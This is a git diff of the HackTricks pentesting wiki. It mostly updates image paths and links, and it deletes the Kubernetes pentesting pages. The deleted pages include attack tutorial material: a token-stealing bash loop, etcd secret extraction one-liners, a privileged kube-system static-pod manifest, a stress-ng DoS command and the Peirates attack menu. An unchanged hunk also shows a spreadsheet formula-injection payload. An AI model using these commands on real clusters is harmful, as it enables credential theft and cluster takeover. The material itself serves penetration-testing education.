Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md index b2b06adbf..cc20ee029 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -142,7 +142,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 3113f2c56..d58b67ff1 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -723,7 +723,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index d8073e5a6..1f739c2ba 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -99,7 +99,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**H2 - Java SQL database**](h2-java-sql-database.md) * [**IIS tricks**](iis-internet-information-services.md) * [**JBOSS**](jboss.md) -* [**Jenkins**](../../cloud-security/jenkins.md) +* [**Jenkins**](broken-reference) * [**Jira**](jira.md) * [**Joomla**](joomla.md) * [**JSP**](jsp.md) diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index 1e0ade9a8..c2a59cb7f 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -332,7 +332,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (2).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index 32a878791..2462c0d53 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -185,7 +185,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * ``` -![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png) +![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png) If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. @@ -211,7 +211,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ![](<../../.gitbook/assets/image (102).png>) diff --git a/pentesting-web/formula-doc-latex-injection.md b/pentesting-web/formula-doc-latex-injection.md index 7414b872c..3a798ff65 100644 --- a/pentesting-web/formula-doc-latex-injection.md +++ b/pentesting-web/formula-doc-latex-injection.md @@ -55,7 +55,7 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### More diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index b337f32b5..0673d970f 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -22,7 +22,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (3).png>) ## Tool diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 2008c32cd..9b78a9a4a 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -195,13 +195,13 @@ Some **examples**: ## WAF bypass encoding image -![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg) +![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg) ## Injecting inside raw HTML When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using `-->` or `--!>`**_ +_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_ In this case and if no black/whitelisting is used, you could use payloads like: diff --git a/pentesting/pentesting-kubernetes/README.md b/pentesting/pentesting-kubernetes/README.md deleted file mode 100644 index f90e9649d..000000000 --- a/pentesting/pentesting-kubernetes/README.md +++ /dev/null @@ -1,112 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Kubernetes Basics - -If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: - -{% content-ref url="kubernetes-basics.md" %} -[kubernetes-basics.md](kubernetes-basics.md) -{% endcontent-ref %} - -# Pentesting Kubernetes - -## From the Outside - -There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. - -Depending on the configuration and your privileges you might be able to abuse that environment, for more information: - -{% content-ref url="pentesting-kubernetes-from-the-outside.md" %} -[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md) -{% endcontent-ref %} - -## Enumeration inside a Pod - -If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -## Enumerating Kubernetes with Credentials - -You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) -{% endcontent-ref %} - -Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here: - -{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -## Privesc to a different Namespace - -If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/namespace-escalation.md" %} -[namespace-escalation.md](../../cloud-security/pentesting-kubernetes/namespace-escalation.md) -{% endcontent-ref %} - -## From Kubernetes to the Cloud - -If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**. - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) -{% endcontent-ref %} - -# Labs to practice and learn - -* [https://securekubernetes.com/](https://securekubernetes.com) -* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) - -# Hardening Kubernetes - -{% content-ref url="kubernetes-hardening/" %} -[kubernetes-hardening](kubernetes-hardening/) -{% endcontent-ref %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md deleted file mode 100644 index dc3c52326..000000000 --- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md +++ /dev/null @@ -1,374 +0,0 @@ -# Attacking Kubernetes from inside a Pod - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## **Pod Breakout** - -**If you are lucky enough you may be able to escape from it to the node:** - -![](https://sickrov.github.io/media/Screenshot-161.jpg) - -### Escaping from the pod - -In order to try to escape from the pos you might need to **escalate privileges** first, some techniques to do it: - -{% content-ref url="../../linux-hardening/privilege-escalation/" %} -[privilege-escalation](../../linux-hardening/privilege-escalation/) -{% endcontent-ref %} - -You can check this **docker breakouts to try to escape** from a pod you have compromised: - -{% content-ref url="../../linux-hardening/privilege-escalation/docker-breakout/" %} -[docker-breakout](../../linux-hardening/privilege-escalation/docker-breakout/) -{% endcontent-ref %} - -### Abusing Kubernetes Privileges - -As explained in the section about **kubernetes enumeration**: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) -{% endcontent-ref %} - -Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Abusing Cloud Privileges - -If the pod is run inside a **cloud environment** you might be able to l**eak a token from the metadata endpoint** and escalate privileges using it. - -## Search vulnerable network services - -As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should **search potential vulnerable services.** - -### Services - -**For this purpose, you can try to get all the services of the kubernetes environment:** - -``` -kubectl get svc --all-namespaces -``` - -By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to other**. The **namespaces** within the cluster **don't have any network security restrictions by default**. Anyone in the namespace can talk to other namespaces. - -### Scanning - -The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster: - -```bash -sudo apt-get update -sudo apt-get install nmap -nmap-kube () -{ - nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}" -} - -nmap-kube-discover () { - local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,'); - local SERVER_RANGES=" "; - SERVER_RANGES+="10.0.0.1 "; - SERVER_RANGES+="10.0.1.* "; - SERVER_RANGES+="10.*.0-1.* "; - nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}" -} -nmap-kube-discover -``` - -Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**: - -{% content-ref url="pentesting-kubernetes-from-the-outside.md" %} -[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md) -{% endcontent-ref %} - -### Sniffing - -In case the **compromised pod is running some sensitive service** where other pods need to authenticate you might be able to obtain the credentials send from the other pods **sniffing local communications**. - -## Network Spoofing - -By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET\_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**\ -Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**. - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md" %} -[kubernetes-network-attacks.md](../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) -{% endcontent-ref %} - -## Node DoS - -There is no specification of resources in the Kubernetes manifests and **not applied limit** ranges for the containers. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment. - -This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng): - -``` -stress-ng --vm 2 --vm-bytes 2G --timeout 30s -``` - -You can see the difference between while running `stress-ng` and after - -```bash -kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx -``` - -![Scenario 13 kubectl top](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-13-3.png) - -## Node Post-Exploitation - -If you managed to **escape from the container** there are some interesting things you will find in the node: - -* The **Container Runtime** process (Docker) -* More **pods/containers** running in the node you can abuse like this one (more tokens) -* The whole **filesystem** and **OS** in general -* The **Kube-Proxy** service listening -* The **Kubelet** service listening. Check config files: - * Directory: - * `/var/lib/kubelet/kubeconfig` - * `/var/lib/kubelet/kubelet.conf` - * `/var/lib/kubelet/config.yaml` - * `/var/lib/kubelet/kubeadm-flags.env` - * `/etc/kubernetes/kubelet-kubeconfig` - * `/etc/kubernetes/kubelet.conf` - * `/etc/kubernetes/admin.conf` - * `/etc/kubernetes/controller-manager.conf` - * `/etc/kubernetes/scheduler.conf` - * Other **kubernetes common files**: - * `$HOME/.kube/config` - **User Config** - * `/etc/kubernetes/bootstrap-kubelet.conf` - **Bootstrap Config** - * `/etc/kubernetes/manifests/etcd.yaml` - **etcd Configuration** - * `/etc/kubernetes/pki` - **Kubernetes Key** - -### Find node kubeconfig - -If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**: - -``` -ps -ef | grep kubelet -root 1406 1 9 11:55 ? 00:34:57 kubelet --cloud-provider=aws --cni-bin-dir=/opt/cni/bin --cni-conf-dir=/etc/cni/net.d --config=/etc/kubernetes/kubelet-conf.json --exit-on-lock-contention --kubeconfig=/etc/kubernetes/kubelet-kubeconfig --lock-file=/var/run/lock/kubelet.lock --network-plugin=cni --container-runtime docker --node-labels=node.kubernetes.io/role=k8sworker --volume-plugin-dir=/var/lib/kubelet/volumeplugin --node-ip 10.1.1.1 --hostname-override ip-1-1-1-1.eu-west-2.compute.internal -``` - -### Steal Secrets - -```bash -# Check Kubelet privileges -kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system - -# Steal the tokens from the pods running in the node -# The most interesting one is probably the one of kube-system -ALREADY="IinItialVaaluE" -for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do - TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) - if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then - ALREADY="$ALREADY|$TOKEN" - echo "Directory: $i" - echo "Namespace: $(cat $i)" - echo "" - echo $TOKEN - echo "================================================================================" - echo "" - fi -done -``` - -The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you looking 1 by 1): - -```bash -./can-they.sh -i "--list -n default" -./can-they.sh -i "list secrets -n kube-system"// Some code -``` - -### Pivot to Cloud - -If the cluster is managed by a cloud service, usually the **Node will have a different access to the metadata** endpoint than the Pod. Therefore, try to **access the metadata endpoint from the node** (or from a pod with hostNetwork to True): - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) -{% endcontent-ref %} - -### Steal etcd - -If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**: - -``` -kubectl get nodes -NAME STATUS ROLES AGE VERSION -k8s-control-plane Ready master 93d v1.19.1 -k8s-worker Ready 93d v1.19.1 -``` - -control-plane nodes have the **role master** and in **cloud managed clusters you won't be able to run anything in them**. - -#### Read secrets from etcd - -If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. - -Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. - -**Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)** - -``` -root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir -``` - -Output: - -```bash -data-dir=/var/lib/etcd -``` - -**View the data in etcd database:** - -```bash -strings /var/lib/etcd/member/snap/db | less -``` - -**Extract the tokens from the database and show the service account name** - -```bash -db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done -``` - -**Same command, but some greps to only return the default token in the kube-system namespace** - -```bash -db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default -``` - -Output: - -``` -1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] -``` - -### Static/Mirrored Pods - -If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**. This basically means that if you get to the node you could be able to **compromise the whole cluster**. However, nothe that according to the documentation: _The spec of a static Pod cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret, etc)_. - -In order to create a static pod you may just need to **save the yaml configuration of the pod in `/etc/kubernetes/manifests`**. The **kubelet service** will automatically talk to the API server to **create the pod**. The API server therefore will be able to see that the pod is running but it cannot manage it. The Pod names will be suffixed with the node hostname with a leading hyphen. - -The **path to the folder** where you should write the pods is given by the parameter **`--pod-manifest-path` of the kubelet process**. If it isn't set you might need to set it and restart the process to abuse this technique. - -**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: bad-priv2 - namespace: kube-system -spec: - containers: - - name: bad - hostPID: true - image: gcr.io/shmoocon-talk-hacking/brick - stdin: true - tty: true - imagePullPolicy: IfNotPresent - volumeMounts: - - mountPath: /chroot - name: host - securityContext: - privileged: true - volumes: - - name: host - hostPath: - path: / - type: Directory -``` - -## Automatic Tools - -* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates) - -``` -Peirates v1.1.8-beta by InGuardians - https://www.inguardians.com/peirates ----------------------------------------------------------------- -[+] Service Account Loaded: Pod ns::dashboard-56755cd6c9-n8zt9 -[+] Certificate Authority Certificate: true -[+] Kubernetes API Server: https://10.116.0.1:443 -[+] Current hostname/pod name: dashboard-56755cd6c9-n8zt9 -[+] Current namespace: prd ----------------------------------------------------------------- -Namespaces, Service Accounts and Roles | ----------------------------------------+ -[1] List, maintain, or switch service account contexts [sa-menu] (try: listsa *, switchsa) -[2] List and/or change namespaces [ns-menu] (try: listns, switchns) -[3] Get list of pods in current namespace [list-pods] -[4] Get complete info on all pods (json) [dump-pod-info] -[5] Check all pods for volume mounts [find-volume-mounts] -[6] Enter AWS IAM credentials manually [enter-aws-credentials] -[7] Attempt to Assume a Different AWS Role [aws-assume-role] -[8] Deactivate assumed AWS role [aws-empty-assumed-role] -[9] Switch authentication contexts: certificate-based authentication (kubelet, kubeproxy, manually-entered) [cert-menu] --------------------------+ -Steal Service Accounts | --------------------------+ -[10] List secrets in this namespace from API server [list-secrets] -[11] Get a service account token from a secret [secret-to-sa] -[12] Request IAM credentials from AWS Metadata API [get-aws-token] * -[13] Request IAM credentials from GCP Metadata API [get-gcp-token] * -[14] Request kube-env from GCP Metadata API [attack-kube-env-gcp] -[15] Pull Kubernetes service account tokens from kops' GCS bucket (Google Cloudonly) [attack-kops-gcs-1] * -[16] Pull Kubernetes service account tokens from kops' S3 bucket (AWS only) [attack-kops-aws-1] ---------------------------------+ -Interrogate/Abuse Cloud API's | ---------------------------------+ -[17] List AWS S3 Buckets accessible (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls] -[18] List contents of an AWS S3 Bucket (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls-objects] ------------+ -Compromise | ------------+ -[20] Gain a reverse rootshell on a node by launching a hostPath-mounting pod [attack-pod-hostpath-mount] -[21] Run command in one or all pods in this namespace via the API Server [exec-via-api] -[22] Run a token-dumping command in all pods via Kubelets (authorization permitting) [exec-via-kubelet] --------------+ -Node Attacks | --------------+ -[30] Steal secrets from the node filesystem [nodefs-steal-secrets] ------------------+ -Off-Menu + ------------------+ -[90] Run a kubectl command using the current authorization context [kubectl [arguments]] -[] Run a kubectl command using EVERY authorization context until one works [kubectl-try-all [arguments]] -[91] Make an HTTP request (GET or POST) to a user-specified URL [curl] -[92] Deactivate "auth can-i" checking before attempting actions [set-auth-can-i] -[93] Run a simple all-ports TCP port scan against an IP address [tcpscan] -[94] Enumerate services via DNS [enumerate-dns] * -[] Run a shell command [shell ] - -[exit] Exit Peirates -``` - -## - -
